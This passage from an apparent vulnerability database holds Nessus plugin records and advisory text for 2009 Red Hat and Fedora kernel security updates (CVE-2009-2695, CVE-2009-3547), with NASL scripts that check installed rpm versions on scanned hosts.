Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* a system with SELinux enforced was more permissive in allowing local\nusers in the unconfined_t domain to map low memory areas even if the\nmmap_min_addr restriction was enabled. This could aid in the local\nexploitation of NULL pointer dereference bugs. (CVE-2009-2695,\nImportant)\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(),\nand pipe_rdwr_open(). When the mutex lock is not held, the i_pipe\npointer could be released by other processes before it is used to\nupdate the pipe's reader and writer counters. This could lead to a\nlocal denial of service or privilege escalation. (CVE-2009-3547,\nImportant)\n\nThis update also fixes the following bug :\n\n* a bug in the IPv6 implementation in the Linux kernel could have\ncaused an unbalanced reference count. When using network bonding, this\nbug may have caused a hang when shutting the system down via 'shutdown\n-h', or prevented the network service from being stopped via 'service\nnetwork stop'. (BZ#538409)\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-2695.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3547.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://kbase.redhat.com/faq/docs/DOC-20481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://kbase.redhat.com/faq/docs/DOC-18042\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2009-1672.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"i686\", reference:\"kernel-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-debug-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-devel-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", reference:\"kernel-doc-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-headers-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-92.1.32.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-92.1.32.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:16", "bulletinFamily": "scanner", "description": "Updated kernel packages that fix multiple security issues and various bugs are now available for Red Hat Enterprise Linux 5.3 Extended Update Support.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThis update fixes the following security issues :\n\n* a system with SELinux enforced was more permissive in allowing local users in the unconfined_t domain to map low memory areas even if the mmap_min_addr restriction was enabled. This could aid in the local exploitation of NULL pointer dereference bugs. (CVE-2009-2695, Important)\n\n* a NULL pointer dereference flaw was found in each of the following functions in the Linux kernel: pipe_read_open(), pipe_write_open(), and pipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could be released by other processes before it is used to update the pipe's reader and writer counters. This could lead to a local denial of service or privilege escalation. (CVE-2009-3547, Important)\n\nThis update also fixes the following bugs :\n\n* a caching bug in nfs_readdir() has been resolved. This may have caused parts of directory listings to become stale, as they came from cached data when they should not have, possibly causing NFS clients to see duplicate files or not see all files in a directory. (BZ#526959)\n\n* a bug prevented the pciehp driver from detecting PCI Express hot plug slots on some systems. (BZ#530381)\n\n* when a process attempted to read from a page that had first been accessed by writing to part of it (via write(2)), the NFS client needed to flush the modified portion of the page out to the server, and then read the entire page back in. This flush caused performance issues. (BZ#521243)\n\n* a deadlock was found in the cciss driver. In rare cases, this caused an NMI lockup during boot. Messages such as 'cciss: controller cciss[x] failed, stopping.' and 'cciss[x]: controller not responding.' may have been displayed on the console. (BZ#525728)\n\nUsers should upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.", "modified": "2017-01-10T00:00:00", "id": "REDHAT-RHSA-2009-1587.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63901", "published": "2013-01-24T00:00:00", "title": "RHEL 5 : kernel (RHSA-2009:1587)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1587. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63901);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2017/01/10 18:05:23 $\");\n\n script_cve_id(\"CVE-2009-2695\", \"CVE-2009-3547\");\n script_bugtraq_id(36901);\n script_xref(name:\"RHSA\", value:\"2009:1587\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2009:1587)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix multiple security issues and various\nbugs are now available for Red Hat Enterprise Linux 5.3 Extended\nUpdate Support.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* a system with SELinux enforced was more permissive in allowing local\nusers in the unconfined_t domain to map low memory areas even if the\nmmap_min_addr restriction was enabled. This could aid in the local\nexploitation of NULL pointer dereference bugs. (CVE-2009-2695,\nImportant)\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(),\nand pipe_rdwr_open(). When the mutex lock is not held, the i_pipe\npointer could be released by other processes before it is used to\nupdate the pipe's reader and writer counters. This could lead to a\nlocal denial of service or privilege escalation. (CVE-2009-3547,\nImportant)\n\nThis update also fixes the following bugs :\n\n* a caching bug in nfs_readdir() has been resolved. This may have\ncaused parts of directory listings to become stale, as they came from\ncached data when they should not have, possibly causing NFS clients to\nsee duplicate files or not see all files in a directory. (BZ#526959)\n\n* a bug prevented the pciehp driver from detecting PCI Express hot\nplug slots on some systems. (BZ#530381)\n\n* when a process attempted to read from a page that had first been\naccessed by writing to part of it (via write(2)), the NFS client\nneeded to flush the modified portion of the page out to the server,\nand then read the entire page back in. This flush caused performance\nissues. (BZ#521243)\n\n* a deadlock was found in the cciss driver. In rare cases, this caused\nan NMI lockup during boot. Messages such as 'cciss: controller\ncciss[x] failed, stopping.' and 'cciss[x]: controller not responding.'\nmay have been displayed on the console. (BZ#525728)\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-2695.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2009-3547.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://kbase.redhat.com/faq/docs/DOC-18042\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://kbase.redhat.com/faq/docs/DOC-20481\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2009-1587.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 362);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debug-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-devel-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", reference:\"kernel-doc-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-headers-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-128.11.1.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-128.11.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:12:40", "bulletinFamily": "scanner", "description": "- Tue Nov 3 2009 Kyle McMartin <kyle at redhat.com> 2.6.30.9-96\n\n - fs/pipe.c: fix NULL pointer dereference (CVE-2009-3547)\n\n - Sun Oct 25 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-95\n\n - Disable the stack protector on functions that don't have onstack arrays.\n\n - Thu Oct 22 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-94\n\n - Fix overflow in KVM cpuid code. (CVE-2009-3638)\n\n - Thu Oct 22 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-93\n\n - Fix exploitable oops in keyring code (CVE-2009-3624)\n\n - Wed Oct 21 2009 Kyle McMartin <kyle at redhat.com>\n\n - shut-up-LOCK_TEST_WITH_RETURN.patch: sort out #445331... or paper bag over it for now until the lock warnings can be killed.\n\n - Mon Oct 19 2009 Kyle McMartin <kyle at redhat.com>\n\n - af_unix-fix-deadlock-connecting-to-shutdown-socket.pat ch: fix for rhbz#529626 local DoS. (CVE-2009-3621)\n\n - Sat Oct 17 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-90\n\n - Fix null deref in r128 (F10#487546) (CVE-2009-3620)\n\n - Sat Oct 17 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-89\n\n - Keyboard and mouse fixes from 2.6.32 (#522126)\n\n - Sat Oct 17 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-88\n\n - Scheduler wakeup patch, fixes high latency on wakeup (sched-update-the-clock-of-runqueue-select-task-rq-sel ected.patch)\n\n - Fri Oct 16 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-87\n\n - Fix uninitialized data leak in netlink (CVE-2009-3612)\n\n - Thu Oct 15 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-86\n\n - AX.25 security fix (CVE-2009-2909)\n\n - Thu Oct 15 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-85\n\n - Disable CONFIG_USB_STORAGE_CYPRESS_ATACB because it causes failure to boot from USB disks using Cypress bridges (#524998)\n\n - Tue Oct 13 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-84\n\n - Copy libata drive detection fix from 2.6.31.4 (#524756)\n\n - Tue Oct 13 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-83\n\n - Networking fixes taken from 2.6.31-stable\n\n - Tue Oct 13 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-82\n\n - Fix boot hang with ACPI on some systems.\n\n - Mon Oct 12 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-81\n\n - Critical ftrace fixes:\n ftrace-use-module-notifier-for-function-tracer.patch ftrace-check-for-failure-for-all-conversions.patch tracing-correct-module-boundaries-for-ftrace_release.p atch\n\n - Thu Oct 8 2009 Ben Skeggs <bskeggs at redhat.com> 2.6.30.9-80\n\n - ppc: compile nvidiafb as a module only, nvidiafb+nouveau = bang! (rh#491308)\n\n - Wed Oct 7 2009 Dave Jones <davej at redhat.com> 2.6.30.9-78\n\n - Disable IRQSOFF tracer. (Adds unnecessary overhead when unused)\n\n - Wed Oct 7 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-77\n\n - eCryptfs fixes taken from 2.6.31.2 (fixes CVE-2009-2908)\n\n - Tue Oct 6 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-76\n\n - fix race in forcedeth network driver (#526546)\n\n - Tue Oct 6 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-75\n\n - x86: Don't leak 64-bit reg contents to 32-bit tasks.\n\n - Tue Oct 6 2009 Chuck Ebbert <cebbert at redhat.com> 2.6.30.9-74\n\n[plus 194 lines in the Changelog]\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2016-12-08T00:00:00", "id": "FEDORA_2009-11032.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=42400", "published": "2009-11-06T00:00:00", "title": "Fedora 11 : kernel-2.6.30.9-96.fc11 (2009-11032)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-11032.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(42400);\n script_version(\"$Revision: 1.20 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:21:54 $\");\n\n script_cve_id(\"CVE-2009-3547\", \"CVE-2009-3621\", \"CVE-2009-3624\", \"CVE-2009-3638\");\n script_bugtraq_id(36723, 36793, 36803, 36901);\n script_xref(name:\"FEDORA\", value:\"2009-11032\");\n\n script_name(english:\"Fedora 11 : kernel-2.6.30.9-96.fc11 (2009-11032)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Tue Nov 3 2009 Kyle McMartin <kyle at redhat.com>\n 2.6.30.9-96\n\n - fs/pipe.c: fix NULL pointer dereference\n (CVE-2009-3547)\n\n - Sun Oct 25 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-95\n\n - Disable the stack protector on functions that don't\n have onstack arrays.\n\n - Thu Oct 22 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-94\n\n - Fix overflow in KVM cpuid code. (CVE-2009-3638)\n\n - Thu Oct 22 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-93\n\n - Fix exploitable oops in keyring code (CVE-2009-3624)\n\n - Wed Oct 21 2009 Kyle McMartin <kyle at redhat.com>\n\n - shut-up-LOCK_TEST_WITH_RETURN.patch: sort out\n #445331... or paper bag over it for now until the lock\n warnings can be killed.\n\n - Mon Oct 19 2009 Kyle McMartin <kyle at redhat.com>\n\n -\n af_unix-fix-deadlock-connecting-to-shutdown-socket.pat\n ch: fix for rhbz#529626 local DoS. (CVE-2009-3621)\n\n - Sat Oct 17 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-90\n\n - Fix null deref in r128 (F10#487546) (CVE-2009-3620)\n\n - Sat Oct 17 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-89\n\n - Keyboard and mouse fixes from 2.6.32 (#522126)\n\n - Sat Oct 17 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-88\n\n - Scheduler wakeup patch, fixes high latency on wakeup\n (sched-update-the-clock-of-runqueue-select-task-rq-sel\n ected.patch)\n\n - Fri Oct 16 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-87\n\n - Fix uninitialized data leak in netlink (CVE-2009-3612)\n\n - Thu Oct 15 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-86\n\n - AX.25 security fix (CVE-2009-2909)\n\n - Thu Oct 15 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-85\n\n - Disable CONFIG_USB_STORAGE_CYPRESS_ATACB because it\n causes failure to boot from USB disks using Cypress\n bridges (#524998)\n\n - Tue Oct 13 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-84\n\n - Copy libata drive detection fix from 2.6.31.4\n (#524756)\n\n - Tue Oct 13 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-83\n\n - Networking fixes taken from 2.6.31-stable\n\n - Tue Oct 13 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-82\n\n - Fix boot hang with ACPI on some systems.\n\n - Mon Oct 12 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-81\n\n - Critical ftrace fixes:\n ftrace-use-module-notifier-for-function-tracer.patch\n ftrace-check-for-failure-for-all-conversions.patch\n tracing-correct-module-boundaries-for-ftrace_release.p\n atch\n\n - Thu Oct 8 2009 Ben Skeggs <bskeggs at redhat.com>\n 2.6.30.9-80\n\n - ppc: compile nvidiafb as a module only,\n nvidiafb+nouveau = bang! (rh#491308)\n\n - Wed Oct 7 2009 Dave Jones <davej at redhat.com>\n 2.6.30.9-78\n\n - Disable IRQSOFF tracer. (Adds unnecessary overhead\n when unused)\n\n - Wed Oct 7 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-77\n\n - eCryptfs fixes taken from 2.6.31.2 (fixes\n CVE-2009-2908)\n\n - Tue Oct 6 2009 Chuck Ebbert <cebbert at redhat.com>\n 2.6.30.9-76\n\n - fix race in forcedeth network driver 